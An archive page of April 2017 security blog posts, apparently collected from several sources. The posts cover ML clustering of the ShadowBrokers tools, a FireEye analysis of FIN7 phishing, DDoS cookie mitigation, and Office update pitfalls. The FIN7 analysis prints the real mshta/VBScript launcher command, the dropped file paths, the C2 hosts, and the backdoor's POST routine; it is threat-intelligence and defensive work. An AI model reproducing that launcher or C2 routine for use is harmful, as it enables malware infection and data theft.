Monthly Archives: April 2017

ShadowBrokers Leak: A Machine Learning Approach

During the past few weeks I have read a lot of great papers, blog posts and magazine articles on the ShadowBrokers leak (free public repositories: here and here). Many of them described the amazing power of these tools (which, by the way, are currently being used by attackers to exploit systems missing the MS17-010 patch), others documented great reverse engineering adventures on some of the most used payloads, and others again described what is going to happen in the near future.

So you are probably wondering why I am writing about this much-discussed topic again. Well, I did not find anyone who had decided to extract features from these tools in order to correlate them with notorious payloads and malware. Following up on my previous blog post, Malware Training Sets: A machine learning dataset for everyone, I decided to "refill" my public GitHub repository with more analyses on this topic.

If you are not familiar with this leak, you probably want to know that the Equation Group (attributed to the NSA) built the FuzzBunch software, an exploitation framework similar to Metasploit. The framework uses several remote exploits for Windows, such as EternalBlue, EternalRomance, EternalSynergy, etc., which in turn call external payloads as well; one of the most famous, as of today, is DoublePulsar, mainly used in SMB and RDP exploits. The system works in a straightforward way, performing the following steps:

  • STEP 1: EternalBlue is launched from the platform with a configuration file (the XML in the image) and a target IP.

EternalBlue working

  • STEP 2: DoublePulsar and additional payloads. Once EternalBlue has successfully exploited Windows (in my case it was Windows 7 SP1), it installs DoublePulsar, which can be used much as a professional pentester would use the Meterpreter/Empire/Beacon backdoors.

DoublePulsar usage
  • STEP 3: DanderSpritz. A command-and-control manager used to handle multiple implants. It can act as a C&C listener, or it can be used to connect directly to targets as well.

DanderSpritz


Following the same process described here (and shown in the following image), I generated a features file for each of the aforementioned Equation Group tools. The process involved detonating the files in multiple sandboxes, performing both dynamic and static analysis. The analysis results were then translated into MIST format and saved as JSON files for convenience.


In order to compare previously generated results (i.e., the notorious malware available here) to the latest leak, and to figure out whether the Equation Group can also be credited with building known malware (included in the repository), you might decide to use one of the several machine learning frameworks available out there. WEKA (developed by the University of Waikato) is a venerable data mining tool which implements several algorithms and compares them against each other in order to find the best fit for a dataset. Since I am looking for the "best" algorithm to apply production machine learning to such a dataset, I decided to go with WEKA: it implements several algorithms "ready to go" and performs automatic performance analysis in order to figure out which algorithm is best in my case. However, WEKA needs a specific input format, called ARFF (described here), while I have a JSON representation of the MIST files. I tried several times to import my MIST JSON files into WEKA, but with no luck. So I decided to write a quick-and-dirty conversion tool, really *not performant* and really *not usable in a production environment*, which converts the (JSONized) MIST format into ARFF format. The following script does this job, assuming the JSONized MIST content has been loaded into a MongoDB server. NOTE: the script is ugly and written just to make it work; there are no input controls, no variable checks, and a very naive and trivial O(m*n^2) loop is implemented.

From MIST to ARFF
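Since the original script is only shown as an image above, here is a minimal sketch of the same idea. The MongoDB layout (database malware, collection mist, documents carrying a label field and a list of MIST tokens) and the one-hot token encoding are assumptions for illustration, not necessarily what the original script does:

# Minimal MIST(JSON)-to-ARFF conversion sketch.
# Assumed (hypothetical) layout: MongoDB db "malware", collection "mist",
# each document with a "label" (family name) and "mist" (list of tokens).
from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017")
docs = list(client.malware.mist.find())

# Build the global attribute set; together with the per-document membership
# test below this is the same naive O(m*n^2) style of loop as the original.
tokens = sorted({t for d in docs for t in d.get("mist", [])})
labels = sorted({d["label"] for d in docs})

with open("MK.arff", "w") as out:
    out.write("@RELATION mist\n\n")
    for t in tokens:
        out.write(f'@ATTRIBUTE "{t}" NUMERIC\n')
    out.write(f"@ATTRIBUTE class {{{','.join(labels)}}}\n\n@DATA\n")
    for d in docs:
        present = set(d.get("mist", []))
        out.write(",".join("1" if t in present else "0" for t in tokens))
        out.write(f",{d['label']}\n")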

The resulting file, MK.arff, is 1.2 GB of pure text ready to be analyzed through WEKA or any other machine learning tool that understands the standard ARFF file format. The script is available here. I am not going to comment on or describe the result sets, since I do not want to reach "governative dangerous conclusions" on my public blog. If you have read this blog post up to here, you have all the processes, the right data and the desired tools to perform the analyses on your own. Below are some short, inconclusive results with no associated comments.

TEST 1:
Algorithm: SimpleKMeans
Number of clusters: 95 (we know it, since the data is labeled)
Seed: 18 (just a random choice)
Distance function: EuclideanDistance, normalized and not inverted.

RESULTS (sum of squared errors: 5.00):

K-Means results

TEST 2:
Algorithm: Expectation Maximisation
Number of clusters: to be discovered
Seed: 0

RESULTS (few significant clusters detected):

Extracted Classes
TEST 3:
Algorithm: Cobweb
Number of clusters: to be discovered
Seed: 42

RESULTS (again, few significant clusters were found):

Few descriptive clusters

As of today, many analysts have done a great job studying the ShadowBrokers leak, but few of them (actually none so far, at least to my knowledge) have tried to cluster result sets derived from the dynamic execution of the leaked tools. In this post I followed my previous path, enlarging my public dataset and offering security researchers the data, procedures and tools to run their own analyses.

Book Review: Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems

The overall equation is pretty simple: If you want to understand network traffic, you really should install Wireshark. And, if you really want to use Wireshark effectively, you should consider this book. Already in its third edition, Practical Packet Analysis both explains how Wireshark works and provides expert guidance on how you can use the tool to solve real-world network problems.

Yes, there are other packet analyzers, but Wireshark is one of the best, works on Windows, Mac, and Linux, and is free and open source. And, yes, there are other books, but this one focuses both on understanding the tool and using it to address the kind of problems that you're likely to encounter.


FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:

\Users\[user_name]\Intel\58d2a83f7778d5.36783181.vbs
\Users\[user_name]\Intel\58d2a83f777942.26535794.ps1
\Users\[user_name]\Intel\58d2a83f777908.23270411.vbs

Also, the script creates a named scheduled task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25 minutes.
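As an illustrative aside (not part of the original FireEye analysis), persistence of this shape is straightforward to hunt for. A rough sketch that enumerates scheduled tasks and flags entries launching a .vbs out of a user's Intel folder, the path pattern described above:

import subprocess

# List all scheduled tasks verbosely and flag ones that launch a .vbs from
# an "Intel" directory. Heuristic only; the path pattern comes from this
# campaign's droppers.
out = subprocess.run(["schtasks", "/query", "/fo", "LIST", "/v"],
                     capture_output=True, text=True).stdout
for block in out.split("\n\n"):
    lowered = block.lower()
    if ".vbs" in lowered and "\\intel\\" in lowered:
        print(block.strip(), end="\n\n")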

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:

aaa.stage.14919005.www1.proslr3[.]com

Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:

 [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com
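For defenders, that fallback naming scheme is easy to express as a regular expression over DNS logs. A minimal sketch (the domain is the one reported above; the matching logic is an illustration, not FireEye tooling):

import re

# Matches the shellcode's C2 fallback pattern described above.
C2_FALLBACK = re.compile(r"^[a-z]{3}\.stage\.14919005\.www1\.proslr3\.com$")

for name in ("aaa.stage.14919005.www1.proslr3.com",
             "xyz.stage.14919005.www1.proslr3.com",
             "stage.14919005.www1.proslr3.com"):
    print(name, "->", bool(C2_FALLBACK.match(name)))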

VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:

\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk

This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 server:

hxxp://198[.]100.119.6:80/cd
hxxp://198[.]100.119.6:443/cd
hxxp://198[.]100.119.6:8080/cd

This version of HALFBAKED listens for the following commands from the C2 server:

  • info: Sends victim machine information (OS, processor, BIOS and running processes) using WMI queries
  • processList: Sends a list of running processes
  • screenshot: Takes a screenshot of the victim machine (using 58d2a83f777688.78384945.ps1)
  • runvbs: Executes a VBScript
  • runexe: Executes an EXE file
  • runps1: Executes a PowerShell script
  • delete: Deletes the specified file
  • update: Updates the specified file

All communication between the backdoor and the attacker's C2 is encoded using the following technique, represented in pseudocode:

Function send_data(data)
    random_string = custom_function_to_generate_random_string()
    encoded_data = URLEncode(SimpleEncrypt(data))
    post_data("POST", random_string & "=" & encoded_data, Hard_coded_c2_url, Create_Random_Url(class_id))
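For clarity, here is a rough Python rendition of that pseudocode. The XOR routine is a placeholder for SimpleEncrypt, whose actual algorithm is not given here, and the C2 URL handling is simplified:

import random
import string
import urllib.parse
import urllib.request

def simple_encrypt(data: bytes) -> bytes:
    # Placeholder: the real SimpleEncrypt algorithm is not documented here.
    return bytes(b ^ 0x5A for b in data)

def random_string(length: int = 8) -> str:
    return "".join(random.choices(string.ascii_lowercase, k=length))

def send_data(data: bytes, c2_url: str) -> None:
    # "<random name>=<urlencoded encrypted data>" in a POST body, as above.
    encoded_data = urllib.parse.quote_from_bytes(simple_encrypt(data))
    body = f"{random_string()}={encoded_data}".encode()
    req = urllib.request.Request(c2_url, data=body, method="POST")
    # urllib.request.urlopen(req)  # actual network call left out of this sketch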

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

  • Version: 0
  • NetBIOS name: andy-pc
  • Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • MAC address: 08:00:27:3d:52:68
  • UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
  • UUID sequence number: 2861

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.
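As a side note, the MAC address, timestamp and sequence number in that list can be recovered directly from the version-1 "birth droid file identifier" UUID with nothing but the Python standard library:

import uuid
from datetime import datetime, timedelta, timezone

# The version-1 UUID from the LNK properties listed above.
u = uuid.UUID("a6eea972-0e2f-11e7-8b2d-0800273d5268")

# The node field is the generating host's MAC address; the 08:00:27 OUI
# is VirtualBox's default NIC, hence the VirtualBox attribution.
mac = ":".join(f"{b:02x}" for b in u.node.to_bytes(6, "big"))

# Version-1 UUID time counts 100 ns intervals since 1582-10-15.
ts = datetime(1582, 10, 15, tzinfo=timezone.utc) + timedelta(microseconds=u.time // 10)

print(mac, ts, u.clock_seq)  # 08:00:27:3d:52:68, 2017-03-21 12:12:28.500 UTC, 2861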

Example Phishing Lures

  • Filename: Doc33.docx
  • MD5: 6a5a42ed234910121dbb7d1994ab5a5e
  • Filename: Mail.rtf
  • MD5: 1a9e113b2f3caa7a141a94c8bc187ea7

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

Mitigating application layer (HTTP(S)) DDoS attacks

DDoS attacks seem to be the new norm on the Internet. Years ago only big websites and web applications got attacked, but nowadays rather small and medium companies or institutions get attacked too. This makes it necessary for administrators of smaller sites to plan for the day they get attacked. This blog post shows you what you can do yourself and for what you need external help. As you'll see later, you can most likely only mitigate DDoS attacks against the application layer by yourself, and you need help for all other attacks. One important part of a successful defense against a DDoS attack, which I won't explain here in detail, is a good media strategy: e.g., if you can convince the media that the attack is no big deal, they may not report sensationally about it and make the attack appear bigger and more problematic than it was. A classic example is a DDoS against a website that only shows information and has no impact on day-to-day operations. But there are better blogs for this non-technical topic, so let's get into the technical part.

different DDoS attacks

From the point of view of an administrator of a small website or web application, there are basically two types of attacks:

  • An attack that saturates your Internet connection or your provider's. (bandwidth and traffic attack)
  • Attacks against your website or web application itself. (application attack)

saturation attacks

Let's take a closer look at the first type of attack. There are many different variations of this connection saturation attack, and the details do not matter much for the SME administrator: you can't do anything against it by yourself. Why? You can't do anything on your server, as the good traffic can't reach your server in the first place; your Internet connection, or a connection/router of your Internet Service Provider (ISP), is already saturated with attack traffic. The mitigation needs to take place on a system upstream of the saturated part. There are different methods to mitigate such attacks.

Depending on the type of website it is possible to use a Content Delivery Network (CDN). A CDN basically caches the data of your website in multiple geographically distributed locations. This way each location gets attacked by only a part of the attacking systems. This is a nice way to also guard against many application layer attacks, but it does not work (or not easily) if the content of your site is not the same for every client / user; e.g. an information website with some downloads and videos is easily changed to use a CDN, but an application like a webmail system or an accounting system will be hard to adapt and will not gain 100% protection even then. Another problem with CDNs is that you must protect each website separately. That's OK if you have only one big website that is the core of your business, but it becomes a problem if attackers can choose from multiple sites/applications. A classic example is a company that protects its homepage with a CDN, but the attacker finds, via Google, the webmail of the company's Exchange Server. Instead of attacking the CDN, he attacks the Internet connection in front of the webmail. The problem will then most likely be that the site-to-site VPN connections to the company's remote offices are down, and working with the central systems is no longer possible for the employees in the remote locations.

So let's assume for the rest of the document that using a CDN is not possible or not feasible. In that case you need to talk to your ISPs. The following are possible mitigations a provider can deploy for you:

  • Using a dedicated DDoS mitigation tool. These tools take all traffic and filter most of the bad traffic out. For this to work, the mitigation tool needs to know your normal traffic patterns, and the DDoS needs to be small enough that the provider's Internet connections are able to handle it. Some companies sell on-premises mitigation tools; don't buy them, it's a waste of money, as they sit behind the very link that gets saturated.
  • If the DDoS attack is against an IP address which is not mission critical (e.g. the attack is against the website, but the web application is the critical system), let the provider block all traffic to that IP address. If the provider has an agreement with its upstream provider, it is even possible to filter that traffic before it reaches the provider, so this also works if the ISP's Internet connection cannot handle the attack.
  • If you have your own IP space, it is possible for your provider(s) to stop announcing your IP addresses/subnet to every router in the world and, e.g., only announce it to local providers. This helps reduce the traffic to an amount which can be handled by a mitigation tool or by your Internet connection. This is an especially good mitigation method if your main audience is local, e.g. 90% of your customers/clients are from the same region or country as you; during an attack you don't care about IP addresses from some far-away country.
  • A special case of the last point is connecting to a local Internet exchange, which may also help reduce your Internet costs and in any case raises your resilience against DDoS attacks.

This covers the basics and allows you to understand and talk with your providers eye to eye. There is also a subcategory of saturation attacks which saturates not the connection but the server or firewall (e.g. SYN floods), but as most small and medium companies will have at most a one Gbit Internet connection, it is unlikely that a decent server (and its operating system) or firewall is the limiting factor; most likely it's the application on top of it.

application layer attacks

Which is a perfect transition to this chapter about application layer DDoS. Let's start with an example to describe this kind of attack. Some years ago a common attack was to use the pingback feature of WordPress installations to flood a given URL with requests. I've seen such an attack hammering a special URL on a target system, one which did something CPU- and memory-intensive, and it led to a successful DDoS against the application with less than 10 Mbit of traffic. All requests were valid requests, and as the URL was an HTTPS one (which is more likely than not today), mitigation in the network was not possible. The solution was quite easy in this case, as the HTTP User-Agent was WordPress, which was easy to filter on the web server and had no side effects.

But this was a specific mitigation which would have been easy to bypass had the attacker seen it and changed the requests from his botnet. This leads to the main problem with this kind of attack: you need to be able to block the bad traffic and let the good traffic through. Persistent attackers commonly change the attack mode: an attack is run with method 1 until you're able to filter it out, then the attacker changes to the next method. This can go on for days. To make it harder for an attacker, it is a good idea to implement some kind of human-vs-bot detection method.

I’m human

The “I’m human” button from Google is quite well known, and the technique behind it is that it rates the connection (source IP address, cookies (from login sessions to Google), ...) and with that information decides whether the request is from a human or not. If the system is sure the request is from a human, you won't see anything. If it's slightly unsure, a simple green check-mark will be shown; if it's more unsure or thinks the request is from a bot, it will show a CAPTCHA. So the question is: can we implement something similar ourselves? Sure we can, let's dive into it.

peace time

Set a special DDoS cookie when a user authenticates correctly during peace time. I'll describe the data in the cookie in detail later.

war time

So let's say we detected an attack, manually or automatically, by checking the number of requests e.g. against the login page. In that case the bot/human detection gets activated. Now the web server checks each request for the presence of the DDoS cookie and whether the cookie can be decoded correctly. All requests which don't contain a valid DDoS cookie get temporarily redirected to a separate host, e.g. https://iamhuman.example.org. The referrer is the originally requested URL. This host runs on a different server (so if it gets overloaded it does not affect the normal users). It shows a CAPTCHA, and if the user solves it correctly, the DDoS cookie will be set for example.org and a redirect to the original URL will be sent.

Info: If you get requests from some trusted IP ranges, e.g. internal IP addresses or IP ranges from partner organizations, you can exclude them from the redirect to the CAPTCHA page.

sophistication ideas and cookie

An attacker could obtain a cookie and use it for his bots. To guard against this, write the IP address of the client encrypted into the cookie. Also put the timestamp of the creation of the cookie encrypted into it. Storing the username as well, if the cookie was created by the login process, is a good idea to see which user got compromised.

Encrypt the cookie with an authenticated encryption algorithm (e.g. AES-128-GCM) and put the following into it:

  • NONCE
  • type
    • L for a login cookie
    • C for a CAPTCHA cookie
  • username
    • Only if login cookie
  • client IP address
  • timestamp

The key for encrypting/decrypting the cookie is static and does not leave the servers. The cookie should be set for the whole domain, to be able to protect multiple websites/applications. Also make it HttpOnly, to make stealing it harder.
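A minimal sketch of such a cookie in Python, assuming the third-party cryptography package. The field layout follows the list above, but the separator, encoding and age limit are illustrative choices:

import base64
import os
import time
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

KEY = AESGCM.generate_key(bit_length=128)  # static, kept on the servers only

def make_cookie(typ: str, client_ip: str, username: str = "") -> str:
    # typ is "L" for a login cookie, "C" for a CAPTCHA cookie.
    plaintext = f"{typ}|{username}|{client_ip}|{int(time.time())}".encode()
    nonce = os.urandom(12)  # the NONCE from the field list above
    ct = AESGCM(KEY).encrypt(nonce, plaintext, None)
    return base64.urlsafe_b64encode(nonce + ct).decode()

def check_cookie(cookie: str, client_ip: str, max_age: int = 14 * 86400) -> bool:
    try:
        raw = base64.urlsafe_b64decode(cookie.encode())
        pt = AESGCM(KEY).decrypt(raw[:12], raw[12:], None)
        typ, username, ip, ts = pt.decode().split("|")
        return typ in ("L", "C") and ip == client_ip and time.time() - int(ts) < max_age
    except Exception:
        return False  # wrong key, tampered data or malformed cookie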

implementation

On the normal web server, which checks the cookie, the following implementations are possible:

  • The Apache web server provides the mod_session_* family of modules, which covers some of the needed functionality, but not all of it.
  • The Apache RewriteMap facility (https://httpd.apache.org/docs/2.4/rewrite/rewritemap.html) with "prg: External Rewriting Program" should allow everything; performance may be an issue. A sketch of such a program follows after this list.
  • Your own Apache module.
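To make the RewriteMap option more concrete, here is a minimal sketch of a "prg:" external rewriting program. The one-key-per-line protocol is Apache's; the key layout (cookie value and client IP separated by a space) and the import of the check_cookie helper from the earlier sketch are assumptions:

#!/usr/bin/env python3
# RewriteMap "prg:" helper: Apache writes one lookup key per line to stdin
# and reads one answer line from stdout; "NULL" means no result.
import sys

from ddos_cookie import check_cookie  # the validation helper sketched above (hypothetical module name)

for line in sys.stdin:
    try:
        cookie, client_ip = line.strip().split(" ", 1)
        answer = "ok" if check_cookie(cookie, client_ip) else "NULL"
    except ValueError:
        answer = "NULL"  # malformed key
    sys.stdout.write(answer + "\n")
    sys.stdout.flush()  # required: Apache blocks until it sees the answer line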

If you know about any other method, please write a comment!

The CAPTCHA issuing host is quite simple.

  • Use any minimalistic website with PHP/Java/Python to create the cookie
  • Create your own CAPTCHA or integrate a solution like reCAPTCHA

pros and cons

  • Pro
    • Users that authenticated within the last weeks won't see the DDoS mitigation. Most likely these are your power users / biggest clients.
    • It's possible to step up the protection gradually, e.g. the IP address binding is only needed when the attacker is using valid cookies.
    • The primary web server does not need any database or external system to check the cookie.
    • The most likely attack case is that the cookie is not set at all, which takes very few CPU resources to check.
    • Sending a 302 to the bot creates only a few bytes of traffic, and if the bot requests the redirect URL, that lands on another server, so there is no load on the server we want to protect.
    • No change to the applications is necessary.
    • The operations team does not need to be expert in mitigating attacks against the application layer; simply activating the protection is enough.
    • Traffic stays local and is not sent to an external provider (which may be a problem for a bank, or under data protection laws in Europe).
  • Cons
    • How to handle automated requests (APIs)? Make exceptions for these, or block them in case of an attack?
    • Problems with non-browser clients, like ActiveSync clients.
    • Multiple domains need multiple cookies.

All in all I see this as a good mitigation method for application layer attacks, and I hope this blog post helps you and your business. Please leave feedback in the comments. Thx!

Mac attack

After years of enjoying relative security through obscurity, many attack vectors have recently proved successful on the Apple Mac, opening the Mac up to future attack. A reflection of this is the final quarter of 2016, when Mac OS malware samples increased by 247% according to McAfee. Even though threats are still much lower than for …

Battery Backup PSA

One of the better things you can do to protect the money you spend on electronic devices is to have a good surge protector and battery backup. If you're like me, you only buy the kind where you can disable the audible alarms. The problem with this is that now you might not get any warning if the battery goes bad.

In some cases you'll have the battery backup connected to a computer via USB and receive notices that way. But in other cases, where the battery backup is protecting home entertainment equipment, your cable modem or your router, you might not know you have a problem until you happen to be home during a power hit. Imagine how many times your equipment may have taken a hit that you didn't know about.

The battery backup I just purchased says the battery is good for about three years. So put it on your calendar. If your battery backup has a visual indicator that it's broken, check that. And you may want to use the software that comes with the battery backup to connect to each one and manually run a self-test. (Consult your own UPS manual about the best way to do that.)


The Twisty Maze of Getting Microsoft Office Updates

While investigating the fixes for the recent Microsoft Office OLE vulnerability, I encountered a situation that led me to believe that Office 2016 was not properly patched. However, after further investigation, I realized that the update process of Microsoft Update has changed. If you are not aware of these changes, you may end up with a Microsoft Office installation that is missing security updates. With the goal of preventing others from making similar mistakes as I have, I outline in this blog post how the way Microsoft Office receives updates has changed.

The Bad Old Days

Let's go back about 15 years in Windows computing to the year 2002. You've got a shiny new desktop with Windows XP and Office XP as well. If you knew where the option was in Windows, you could turn on Automatic Updates to download and notify you when OS updates are made available. What happens when there is a security update for Office? If you happened to know about the OfficeUpdate website, you could run an ActiveX control to check for Microsoft Office updates. Notice that the Auto Update link is HTTP instead of HTTPS. These were indeed dark times. But we had Clippy to help us through it!

officexp_clippy.png

Microsoft Update: A New Hope

Let's fast-forward to the year 2005. We now have Windows XP Service Pack 2, which enables a firewall by default. Windows XP SP2 also encourages you to enable Automatic Updates for the OS. But what about our friend Microsoft Office? As it turns out, an enhanced version of Windows Update, called Microsoft Update, was also released in 2005. The new Microsoft Update, instead of checking for updates for only the OS itself, now also checks for updates for other Microsoft software, such as Microsoft Office. If you enabled this optional feature, then updates for Microsoft Windows and Microsoft Office would be installed.

Microsoft Update in Modern Windows Systems

Enough about Windows XP, right? How does Microsoft Update factor into modern, supported Windows platforms? Microsoft Update is still supported through current Windows 10 platforms. But in each of these versions of Windows, Microsoft Update continues to be an optional component, as illustrated in the following screen shots for Windows 7, 8.1, and 10.

Windows 7

win7_windows_update.png

win7_microsoft_update.png

Once this dialog is accepted, we can now see that Microsoft Update has been installed. We will now receive updates for Microsoft Office through the usual update mechanisms for Windows.

win7_microsoft_update_installed.png

Windows 8.1

Windows 8.1 has Microsoft Update built-in; however, the option is not enabled by default.

win8_microsoft_update.png

Windows 10

Like Windows 8.1, Windows 10 also includes Microsoft Update, but it is not enabled by default.

win10_microsoft_update.png

Microsoft Click-to-Run

Microsoft Click-to-Run is a feature where users "... don't have to download or install updates. The Click-to-Run product seamlessly updates itself in the background." The Microsoft Office 2016 installation that I obtained through MSDN is apparently packaged in Click-to-Run format. How can I tell this? If you view the Account settings in Microsoft Office, a Click-to-Run installation looks like this:

office16_about.png

Additionally, you should notice a process called OfficeClickToRun.exe running:

procmon-ctr.png
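If you'd rather check from a script than from Task Manager, a trivial sketch (the process name is the one shown above; the check itself is just an illustration):

import subprocess

# Ask tasklist whether the Click-to-Run service process is present.
out = subprocess.run(
    ["tasklist", "/FI", "IMAGENAME eq OfficeClickToRun.exe"],
    capture_output=True, text=True,
).stdout
print("Click-to-Run detected" if "OfficeClickToRun.exe" in out
      else "Click-to-Run not running")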

Microsoft Office Click-to-Run and Updates

The interaction between a Click-to-Run version of Microsoft Office and Microsoft Updates is confusing. For the past dozen years or so, when a Windows machine completed running Microsoft Update, you could be pretty sure that Microsoft Office was up to date. As a CERT vulnerability analyst, my standard process on a Microsoft patch Tuesday was to restore my virtual machine snapshots, run Microsoft Update, and then consider that machine to have fully patched Microsoft software.

I first noticed a problem when my "fully patched" Office 2016 system still executed calc.exe when I opened my proof-of-concept exploit for CVE-2017-0199. Only after digging into the specific version of Office 2016 that was installed on my system did I realize that it did not have the April 2017 update installed, despite having completed Microsoft Update and rebooting. After setting up several VMs with Office 2016 installed, I was frequently presented with a screen like this:

office2016_no_updates_smaller.png

The problem here is obvious:

  • Microsoft Update is indicating that the machine is fully patched when it isn't.
  • The version of Office 2016 that is installed is from September 2015, which is outdated.
  • The above screenshot was taken on May 3, 2017, which shows that updates were still not being offered even though they had long been available.

I would love to have determined why my machines were not automatically retrieving updates. But unfortunately there appear to be too many variables at play to pinpoint the issue. All I can conclude is that my Click-to-Run installations of Microsoft Office did not receive updates for Microsoft Office 2016 until as late as 2.5 weeks after the patches were released to the public. And in the case of the April 2017 updates, there was at least one vulnerability that was being exploited in the wild, with exploit code being publicly available. This amount of time is a long window of exposure.

It is worth noting that the manual update button within the Click-to-Run Office 2016 installation does correctly retrieve and install updates. The problem I see here is that it requires manual user interaction to be sure that your software is up to date. Microsoft has indicated to me that this behavior is by design:

[Click-to-Run] updates are pushed automatically through gradual rollouts to ensure the best product quality across the wide variety of devices and configurations that our customers have.

Personally, I wish that the update paths for Microsoft Office were more clearly documented.

Update: April 11, 2018

Microsoft Office Click-to-Run updates are not necessarily released on the official Microsoft "Patch Tuesday" dates. For this reason, Click-to-Run Office users may have to wait additional time to receive security updates.

Conclusions and Recommendations

To prevent this problem from happening to you, I recommend that you do the following:

  • Enable Microsoft Update to ensure that you receive updates for software beyond just the core Windows operating system. This switch can be automated using the technique described here: https://msdn.microsoft.com/en-us/aa826676.aspx (a sketch of that technique follows after this list)
  • If you have a Click-to-Run version of Microsoft Office installed, be aware that it will not receive updates via Microsoft Update.
  • If you have a Click-to-Run version of Microsoft Office and want to ensure timely installation of security updates, manually check for updates rather than relying on the automatic update capability of Click-to-Run.
  • Enterprise customers should refer to Deployment guide for Office 365 ProPlus to ensure that updates for Click-to-Run installations meet their security compliance timeframes.
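For convenience, here is a minimal sketch of the Microsoft Update opt-in technique from the MSDN page referenced above, translated to Python. It assumes the third-party pywin32 package; the GUID is the well-known Microsoft Update service ID, and the flag value follows the documented example:

# Opt a machine in to Microsoft Update via the Windows Update Agent COM API.
# Run elevated. Assumes the third-party pywin32 package is installed.
import win32com.client

MICROSOFT_UPDATE_SERVICE_ID = "7971f918-a847-4430-8bdb-7c3538ee6ef2"

service_manager = win32com.client.Dispatch("Microsoft.Update.ServiceManager")
service_manager.ClientApplicationID = "My App"  # hypothetical application name
# 7 = asfAllowPendingRegistration | asfAllowOnlineRegistration
#   | asfRegisterServiceWithAU (register the service with Automatic Updates)
service_manager.AddService2(MICROSOFT_UPDATE_SERVICE_ID, 7, "")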

BrickerBot Permanent Denial-of-Service Attack (Update A)

